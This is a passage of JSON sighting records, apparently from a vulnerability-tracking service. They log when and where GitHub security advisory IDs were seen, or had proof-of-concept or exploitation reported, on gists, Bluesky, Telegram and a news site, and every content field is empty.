"ace5e477-e208-4f0e-8f05-ec60de5e759b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q9p7-wqxg-mrhc", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mqawqmhsco2b", "content": "", "creation_timestamp": "2026-07-10T00:54:01.839304Z"}, {"uuid": "6f9de66f-ae81-4043-af4d-17f8f23b55c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9m9w-gxf7-rh8m", "type": "seen", "source": "https://gist.github.com/alon710/34fe998f34bdbbf866bd428a21589671", "content": "", "creation_timestamp": "2026-07-10T01:41:47.977484Z"}, {"uuid": "8c244bae-314b-4c1d-ab86-046b856743f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mc85-72gr-vm9f", "type": "seen", "source": "https://gist.github.com/alon710/771904cdd1d35750b64c7a038f4ce112", "content": "", "creation_timestamp": "2026-07-10T02:12:08.065396Z"}, {"uuid": "6089deee-a886-44d5-844b-0f16dd781058", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q7jx-v53g-848w", "type": "seen", "source": "https://gist.github.com/alon710/c858490dcced6d8c05b3d0f0cec528f1", "content": "", "creation_timestamp": "2026-07-10T02:42:38.390271Z"}, {"uuid": "8c255623-755c-4d45-93e0-1772ade35831", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7835-87q9-rgvv", "type": "seen", "source": "https://bsky.app/profile/mel-echosphere.bsky.social/post/3mqcxbpjci62k", "content": "", "creation_timestamp": "2026-07-10T20:08:54.705728Z"}, {"uuid": "95f619df-c2d8-400b-a944-9478bca0cf70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hjr6-g723-hmfm", "type": "seen", "source": "https://bsky.app/profile/iberianm.bsky.social/post/3mqcwsfxjof2i", "content": "", "creation_timestamp": "2026-07-10T20:00:23.245537Z"}, {"uuid": "e4d3f606-2c36-4635-8154-9db50b9c3ce0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w7cg-whh7-xp28", "type": "seen", "source": "https://gist.github.com/alon710/b90f7da9d543dd51155aefe8a87d6f66", "content": "", "creation_timestamp": "2026-07-10T19:42:40.596424Z"}, {"uuid": "51a109f5-cea9-4eaa-86b0-85ad38fca504", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g936-7jqj-mwv8", "type": "seen", "source": "https://gist.github.com/alon710/3aab1c4181e03ef1803e74b755304657", "content": "", "creation_timestamp": "2026-07-10T22:12:05.027481Z"}, {"uuid": "105792f8-b0cd-4152-8519-e5ec5bbccec3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-h4g2-xfmw-q2c9", "type": "seen", "source": "https://gist.github.com/alon710/5e2741edb2d79f8c7e4e9d0fb2942745", "content": "", "creation_timestamp": "2026-07-10T23:12:24.736613Z"}, {"uuid": "8ecbdb7b-2c61-4eef-9d99-2645df49ba07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-h4g2-xfmw-q2c9", "type": "seen", "source": "https://gist.github.com/alon710/5e2741edb2d79f8c7e4e9d0fb2942745", "content": "", "creation_timestamp": "2026-07-11T00:01:00.269797Z"}, {"uuid": "31faed7a-6f75-4ddf-b758-0c3b320a4f59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-56mp-4f3v-fgj2", "type": "seen", "source": "https://gist.github.com/alon710/215bfec609456ef9029abde8936c9791", "content": "", "creation_timestamp": "2026-07-11T00:01:00.193703Z"}, {"uuid": "ba06f7e4-3df7-49a8-ad4d-4cfcc79b3665", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5xfx-xj4h-5p7r", "type": "seen", "source": "https://gist.github.com/alon710/c12d56fc3c8087be09be97f40fd8c89a", "content": "", "creation_timestamp": "2026-07-11T00:12:22.530283Z"}, {"uuid": "9201e883-df24-494d-9545-7437f7fb879f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hjr6-g723-hmfm", "type": "seen", "source": "https://thehackernews.com/2026/07/researcher-details-whatsapp-to-host.html", "content": "", "creation_timestamp": "2026-07-11T01:00:51.486935Z"}, {"uuid": "266111ea-9831-42b8-b90a-5952e25694b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-G5R6-GV6M-F5JV", "type": "seen", "source": "https://gist.github.com/alon710/1f4d78a54bd12c1ceab970579e216233", "content": "", "creation_timestamp": "2026-07-11T00:42:57.861988Z"}, {"uuid": "0e6b2643-c79b-47be-9b1b-46a33dfaa37c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WM45-QH3G-V83F", "type": "seen", "source": "https://gist.github.com/alon710/fc6e89658925d24a4569a59a6ba7a610", "content": "", "creation_timestamp": "2026-07-11T01:11:41.805762Z"}, {"uuid": "02db9ed4-2603-4f98-b6b7-f3af2b44a22c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8MG2-6588-R4HW", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3229", "content": "", "creation_timestamp": "2026-07-12T09:01:47.555943Z"}, {"uuid": "4c600eca-18d5-4bdb-b943-85aa64db4285", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3gjh-29fv-8hr6", "type": "seen", "source": "https://gist.github.com/MattHintz/18acc078a9239f65f06d48e0e8ada1e3", "content": "", "creation_timestamp": "2026-07-12T12:51:29.147837Z"}, {"uuid": "f3543296-e201-4110-b95a-12c5fe4fd555", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-PHRQ-PC6R-F6GH", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/87589", "content": "", "creation_timestamp": "2026-07-12T13:00:03.916054Z"}, {"uuid": "4b018cbd-71b9-42fd-867e-aa3c88e90123", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6ffx-8hjj-jhhf", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mqhotdnxkt22", "content": "", "creation_timestamp": "2026-07-12T17:21:01.353625Z"}, {"uuid": "78af3143-5215-4ef1-8ec0-2262989e81ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x3vq-34gg-cwq7", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mqhoqv74v322", "content": "", "creation_timestamp": "2026-07-12T17:19:39.175719Z"}, {"uuid": "428d21c7-9c31-4435-984d-e8090d5a7c03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2ffj-w4mj-pg37", "type": "seen", "source": "https://gist.github.com/wyattgill9/990529c04d4b62e11a1f63fb789c30e4", "content": "", "creation_timestamp": "2026-07-12T22:58:01.375119Z"}, {"uuid": "454085a3-b7a7-4ef1-b621-b57182906391", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8MG2-6588-R4HW", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3229", "content": "", "creation_timestamp": "2026-07-13T00:00:48.034390Z"}, {"uuid": "7af9c436-c76a-4c76-b36c-1dc9c3f0daae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-PHRQ-PC6R-F6GH", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/87589", "content": "", "creation_timestamp": "2026-07-13T00:00:43.970701Z"}, {"uuid": "fea5758a-d67a-4c55-a0dc-f8bb3619ce1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-CM8G-8JFQ-887P", "type": "seen", "source": "https://t.me/GithubRedTeam/92588", "content": "", "creation_timestamp": "2026-07-14T00:00:10.376011Z"}, {"uuid": "c531f18d-35cd-4bbd-b842-30350b5c99a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-QV97-83W4-FF86", "type": "seen", "source": "https://t.me/GithubRedTeam/92598", "content": "", "creation_timestamp": "2026-07-14T00:00:10.158630Z"}, {"uuid": "22edea62-3cf7-448c-a55e-99f182f0e8bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XW9Q-2MV6-9FR8", "type": "seen", "source": "https://t.me/GithubRedTeam/92590", "content": "", "creation_timestamp": "2026-07-14T00:00:10.086282Z"}, {"uuid": "e8143b01-db48-49e8-9723-14ba723f2960", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FG23-3346-88F5", "type": "seen", "source": "https://t.me/GithubRedTeam/92599", "content": "", "creation_timestamp": "2026-07-14T00:00:09.950602Z"}, {"uuid": "3dcb8828-579d-44e1-96bf-cea259a8720d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8F6J-263M-G72X", "type": "seen", "source": "https://gist.github.com/alon710/0adc313573f186411d15e2bc7c96b8d7", "content": "", "creation_timestamp": "2026-07-14T00:41:43.631436Z"}, {"uuid": "06da4bce-58f5-4d17-8312-c297cee1557e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xf7x-x43h-rpqh", "type": "seen", "source": "https://gist.github.com/alon710/b44757b6afa3477e3470b6c4803062d7", "content": "", "creation_timestamp": "2026-07-14T01:11:57.069549Z"}, {"uuid": "119bb0e2-5088-412d-b523-6cb398951d51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C2H5-PPV9-7VRQ", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/93198", "content": "", "creation_timestamp": "2026-07-14T01:00:10.609412Z"}, {"uuid": "83ac2b2a-e426-48ce-b36e-5e807c0e6da7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-Q4Q6-R8WH-5CGH", "type": "seen", "source": "https://t.me/bdufstecru/3243", "content": "", "creation_timestamp": "2026-07-14T01:00:06.466826Z"}, {"uuid": "ad4a6a57-1319-4242-b0b4-521d65d87227", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-GRP7-V8XH-RJ7H", "type": "seen", "source": "https://t.me/bdufstecru/3248", "content": "", "creation_timestamp": "2026-07-14T01:00:06.351365Z"}, {"uuid": "bf698c46-b4cf-4a9f-9d29-2d2c7ef720c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-HVCG-QMG6-JM4C", "type": "seen", "source": "https://t.me/bdufstecru/3254", "content": "", "creation_timestamp": "2026-07-14T01:00:05.955362Z"}, {"uuid": "4c9572e7-0f58-4954-bd81-9c2eee2e617f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-HGJX-R89M-M7V4", "type": "seen", "source": "https://gist.github.com/alon710/2ffb041b6fdd6557a249f765c7133d25", "content": "", "creation_timestamp": "2026-07-14T21:12:44.789001Z"}, {"uuid": "aaae01de-97f4-4db0-aa7d-d662005871ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MQXV-9RM6-W8QC", "type": "seen", "source": "https://gist.github.com/alon710/c304e0355d4b523094aabb49f860b83c", "content": "", "creation_timestamp": "2026-07-14T22:13:10.258748Z"}, {"uuid": "9474be39-ff43-4fb8-b5fb-d5d09cf967b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v75c-crr9-733c", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mqnvfpbgnk2w", "content": "", "creation_timestamp": "2026-07-15T04:34:38.625347Z"}, {"uuid": "ed10e4c6-3065-44ff-81db-8e82a48c2510", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xgmm-8j9v-c9wx", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mqnvav64vs2k", "content": "", "creation_timestamp": "2026-07-15T04:31:56.854650Z"}, {"uuid": "44f95591-f919-4ed0-957c-bf44f250ac1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jpw9-pfvf-9f58", "type": "seen", "source": "https://gist.github.com/alon710/1d517629bc176ae6cad3ee2369704fcb", "content": "", "creation_timestamp": "2026-07-16T20:31:08.587474Z"}, {"uuid": "6aba0b4e-065e-4649-a32c-90a7f62cb1af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x8mg-6r4p-87pf", "type": "seen", "source": "https://gist.github.com/alon710/52a35a35f7ac3d2e03985e364db77b59", "content": "", "creation_timestamp": "2026-07-16T23:48:09.649455Z"}, {"uuid": "7ac6ae27-ca67-461f-b788-c26539330795", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FG23-3346-88F5", "type": "seen", "source": "Telegram/uxGFUVPy3TOzkodNgeg8vepR-kYpq91Dg5jOn-NGrDlDjCc", "content": "", "creation_timestamp": "2026-07-17T00:00:31.362266Z"}, {"uuid": "2c571aff-d676-4574-91cd-f12d5a02d73c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-QV97-83W4-FF86", "type": "seen", "source": "Telegram/uxGFUVPy3TOzkodNgeg8vepR-kYpq91Dg5jOn-NGrDlDjCc", "content": "", "creation_timestamp": "2026-07-17T00:00:31.340874Z"}, {"uuid": "c639987c-8f7e-4b14-8d2e-528e62575716", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x8mg-6r4p-87pf", "type": "seen", "source": "https://gist.github.com/alon710/52a35a35f7ac3d2e03985e364db77b59", "content": "", "creation_timestamp": "2026-07-17T00:00:25.303309Z"}, {"uuid": "217e9ec1-5e34-4479-b173-5c30aeff1dc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cc7c-9jff-58wj", "type": "seen", "source": "https://gist.github.com/alon710/17e19a604dba0f2f8107309615c5a1ab", "content": "", "creation_timestamp": "2026-09-16T14:31:54.705756Z"}, {"uuid": "151610f8-2d12-47ad-b70b-554d56c64bef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jhmp-mqwm-3gq8", "type": "seen", "source": "https://gist.github.com/alon710/406a76bb8aa1f3068e2e86792c104d53", "content": "", "creation_timestamp": "2026-07-20T19:31:55.362521Z"}, {"uuid": "c2d70ea2-f953-4773-bc4c-e1c57b9a2e5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-499r-g7pc-vmp9", "type": "seen", "source": "https://gist.github.com/alon710/4520df6a85d072915e787e3825f8e5ef", "content": "", "creation_timestamp": "2026-07-20T20:32:00.155880Z"}, {"uuid": "edead90d-f2d6-4b63-a122-782beeb98fb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3jxr-9vmj-r5cp", "type": "seen", "source": "https://gist.github.com/alon710/8cb13493a0f92ed662f2d6291bd0d794", "content": "", "creation_timestamp": "2026-07-20T21:31:31.976012Z"}, {"uuid": "57a57821-778f-4115-a6fb-5e0df178ca02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VJH7-7G9H-FJFH", "type": "seen", "source": "https://t.me/pphm_HackerNews/158", "content": "", "creation_timestamp": "2026-07-20T22:00:04.735959Z"}, {"uuid": "dbde3ff2-adbd-430d-a192-873c69bf2d13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g446-98w2-8p5w", "type": "seen", "source": "https://gist.github.com/alon710/afd4e223ed1d8cf62007fc8baac9d771", "content": "", "creation_timestamp": "2026-07-20T22:31:01.505709Z"}, {"uuid": "e00e54f4-1f40-45aa-8d79-93da03c14c3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-ff9f-jf42-662q", "type": "seen", "source": "https://bsky.app/profile/eulanov.m.eula.dev.ap.brid.gy/post/3mr4fyseqkuz2", "content": "", "creation_timestamp": "2026-07-20T23:09:02.585533Z"}, {"uuid": "aae63ba0-2234-405b-be93-2e0ecfffffc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6Q95-FCWC-4H44", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3329", "content": "", "creation_timestamp": "2026-07-21T00:00:38.066973Z"}, {"uuid": "bbe1048b-a835-4bd1-b913-95d33d549839", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MP56-7VRW-QXVF", "type": "published-proof-of-concept", "source": "https://t.me/ckuRED/643", "content": "", "creation_timestamp": "2026-07-22T00:00:24.089297Z"}, {"uuid": "68fd59e0-e695-40ce-b58f-376aebdd8f3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2p26-p43x-fhp8", "type": "seen", "source": "https://gist.github.com/alon710/e074ac5405ee20f6dd8bded11414265c", "content": "", "creation_timestamp": "2026-07-10T03:12:06.989984Z"}, {"uuid": "3769b202-6c67-436c-b8df-024073a48b82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mjqx-c6f6-7rc2", "type": "seen", "source": "https://gist.github.com/alon710/bc442ee88dc103da228f4212da5b648e", "content": "", "creation_timestamp": "2026-07-10T03:41:59.430076Z"}, {"uuid": "0200b6a9-d03b-4e4c-aa36-3c9c3787e075", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2pg6-44cx-c49v", "type": "seen", "source": "https://gist.github.com/alon710/894d931a4bc3b7f3c7f80c92512208e5", "content": "", "creation_timestamp": "2026-07-10T04:12:07.761913Z"}, {"uuid": "838baf22-3e5a-4b84-9833-7b3f39c94e1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7HF5-MC28-XMCV", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/2451", "content": "", "creation_timestamp": "2026-07-12T00:00:51.695934Z"}, {"uuid": "672d148a-ad9e-4938-9bf3-5d849f39e1ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-W7XJ-8FX7-WFCH", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/2387", "content": "", "creation_timestamp": "2026-07-12T00:00:51.430902Z"}, {"uuid": "d8755ba6-d00a-4e26-93f8-7437abdaa3a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7229-Q9PV-J6P4", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/2267", "content": "", "creation_timestamp": "2026-07-12T00:00:50.993802Z"}, {"uuid": "d929d86e-6fc1-4cef-b8c3-0751e88154ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M42G-XG4C-5F3H", "type": "exploited", "source": "https://t.me/brutsecurity/2189", "content": "", "creation_timestamp": "2026-07-12T00:00:50.855385Z"}, {"uuid": "252555ed-eb2e-45bd-9811-47732d0fa0a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-QCJ2-99CG-MPPF", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/2141", "content": "", "creation_timestamp": "2026-07-12T00:00:50.619873Z"}, {"uuid": "44fc0dd9-f06f-4824-9b1b-5092ff11d5c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-67RR-84XM-4C7R", "type": "seen", "source": "https://t.me/brutsecurity/2040", "content": "", "creation_timestamp": "2026-07-12T00:00:50.188432Z"}, {"uuid": "4b8e24c7-958d-4750-884e-2c810690c4c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2R7G-8HPC-RPQ9", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/2046", "content": "", "creation_timestamp": "2026-07-12T00:00:50.113763Z"}, {"uuid": "5e0cf15e-e9d0-4c16-a6bb-b200b2bf3ada", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F3GW-9WW9-JMC3", "type": "exploited", "source": "https://t.me/brutsecurity/1837", "content": "", "creation_timestamp": "2026-07-12T00:00:48.938981Z"}, {"uuid": "93828f9a-a8a5-4233-a15c-7872408884aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F3GH-529W-V32X", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/1611", "content": "", "creation_timestamp": "2026-07-12T00:00:48.189753Z"}, {"uuid": "259629e0-afe6-400c-a479-e766dc42426e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-73GX-X7R9-77X2", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/1597", "content": "", "creation_timestamp": "2026-07-12T00:00:48.055673Z"}, {"uuid": "2a706685-dd42-4ed1-aef2-75f36c725c5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-X684-96HH-833X", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/1553", "content": "", "creation_timestamp": "2026-07-12T00:00:47.750860Z"}, {"uuid": "f45de638-0eaf-40c4-87fd-d862981ddf03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-23C8-4WWR-G3C6", "type": "seen", "source": "https://t.me/brutsecurity/1466", "content": "", "creation_timestamp": "2026-07-12T00:00:47.426347Z"}, {"uuid": "617b1120-496f-4044-9cb6-2824bc3eaff7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3W2C-JFR2-9PG9", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/1432", "content": "", "creation_timestamp": "2026-07-12T00:00:47.234835Z"}, {"uuid": "fa421d99-40a0-49cc-97e1-b12e0c52d726", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-GV7V-RGG6-548H", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/1117", "content": "", "creation_timestamp": "2026-07-12T00:00:45.637194Z"}, {"uuid": "3193863e-7d13-404e-9549-844c8044118b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9298-4CF8-G4WJ", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/1052", "content": "", "creation_timestamp": "2026-07-12T00:00:45.571422Z"}, {"uuid": "f463143a-ba36-40ef-8046-62caf75fdf11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6FX6-WRPF-CPGV", "type": "seen", "source": "https://t.me/brutsecurity/1014", "content": "", "creation_timestamp": "2026-07-12T00:00:45.307254Z"}, {"uuid": "b16b9a14-1459-4568-908b-ff877d5cc833", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WHXG-WX83-85P5", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/985", "content": "", "creation_timestamp": "2026-07-12T00:00:42.841899Z"}, {"uuid": "210de54f-5f68-4467-ab35-4f2916450de5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-58VJ-CV5W-V4V6", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/962", "content": 